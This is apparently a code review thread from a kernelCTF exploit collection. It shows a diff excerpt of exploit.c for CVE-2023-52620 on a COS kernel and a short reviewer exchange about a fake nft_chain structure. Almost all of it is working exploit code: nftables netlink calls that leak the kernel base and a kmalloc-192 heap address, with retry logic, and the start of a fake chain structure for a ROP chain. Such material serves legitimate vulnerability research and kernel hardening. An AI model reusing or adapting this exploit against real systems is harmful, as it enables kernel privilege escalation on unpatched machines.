pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/cos-105-17412.294.34/exploit.c

```diff
@@ -0,0 +1,834 @@
+    nftnl_rule_nlmsg_build_payload(nlh, rule_get);
+    nftnl_rule_free(rule_get);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    usleep(10*1000);
+
+    ret = mnl_socket_recvfrom(nl, read_data, 0x100);
+
+    if (ret > 0) {
+        memcpy(&counter_ops, &read_data[CHAIN_NAME_OFF], sizeof(uint64_t));
+
+        if(fork() == 0){
+            ret = mnl_socket_recvfrom(nl, read_data, 0x100);
+            exit(1);
+        }
+    }
+
+    kbase = counter_ops - NFT_COUNTER_OPS;
+
+    printf("[*] kbase: %lx\n", kbase);
+
+    return 0;
+}
+
+int exploit(){
+    int ret;
+
+    trigger(set_rop_name, chain_rop_name);
+
+    char rule_data[0x400] = {0,};
+
+    struct nftnl_rule * rule_192 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_192, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_192, NFTNL_RULE_CHAIN, chain_base_name);
+    nftnl_rule_set_data(rule_192, NFTNL_RULE_USERDATA, rule_data, KMALLOC_192_SIZE-NFT_RULE_HEADER_SIZE);
+
+    batch = mnl_nlmsg_batch_start(buf, BUF_SIZE);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_192);
+    mnl_nlmsg_batch_next(batch);
+
+    handle++;
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    char read_data[0x100] = {0,};
+    int retry_count = 0;
+
+    struct nftnl_rule* rule_get;
+
+retry:
+    rule_get = nftnl_rule_alloc();
+    nftnl_rule_set_str(rule_get, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_get, NFTNL_RULE_CHAIN, chain_base_name);
+    nftnl_rule_set_u64(rule_get, NFTNL_RULE_HANDLE, handle_leak_heap);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, family, NLM_F_ACK, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_get);
+    nftnl_rule_free(rule_get);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    ret = mnl_socket_recvfrom(nl, read_data, 0x100);
+    if (ret > 0) {
+        memcpy(&kmalloc_192, &read_data[CHAIN_NAME_OFF], sizeof(uint64_t));
+
+        ret = mnl_socket_recvfrom(nl, read_data, 0x100);
+    }
+
+    if((kmalloc_192 >> 48) != 0xffff){
+        if(retry_count >= RETRY_MAX)
+            return -1;
+
+        printf("retry.. %d\n", retry_count);
+        retry_count++;
+
+        del_rule(handle_rop);
+        handle_rop--;
+
+        goto retry;
+    }
+
+    printf("[*] heap %lx\n", kmalloc_192);
+
+    uint64_t *data = malloc(1024);
+
+    data[0] = kmalloc_192;
```

Comment:
Comment here what you structure are building here and which fields are you setting with `kmalloc_192` and `0`, also why you are using `0` (could other values satisfy the requirements)?

Reply:
I added a comment as follows.

```
    // create fake nft_chain.rules_gen_0
    uint64_t *data = malloc(1024);

    data[0] = kmalloc_192;
```

`data[1] = 0;` is not needed, so I deleted this line.